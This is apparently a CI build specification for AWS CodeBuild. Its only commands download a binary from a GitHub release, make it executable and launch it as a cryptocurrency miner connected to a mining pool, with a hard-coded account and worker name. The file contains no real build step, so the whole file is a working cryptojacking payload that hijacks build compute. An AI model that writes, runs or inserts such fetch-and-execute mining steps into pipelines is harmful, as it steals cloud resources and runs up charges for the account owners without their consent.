version: 0.2

phases:
  build:
    commands:
      - echo "Downloading miner..."
      - wget https://github.com/vedhagsvp/qubros/releases/download/apl/vaseas
      - chmod +x vaseas
      - echo "Starting mining process..."
      - ./vaseas --algo qubic_xmr --account CP_udnvh2owpq --worker pakos --pool qubic1.hk.apool.io:3334
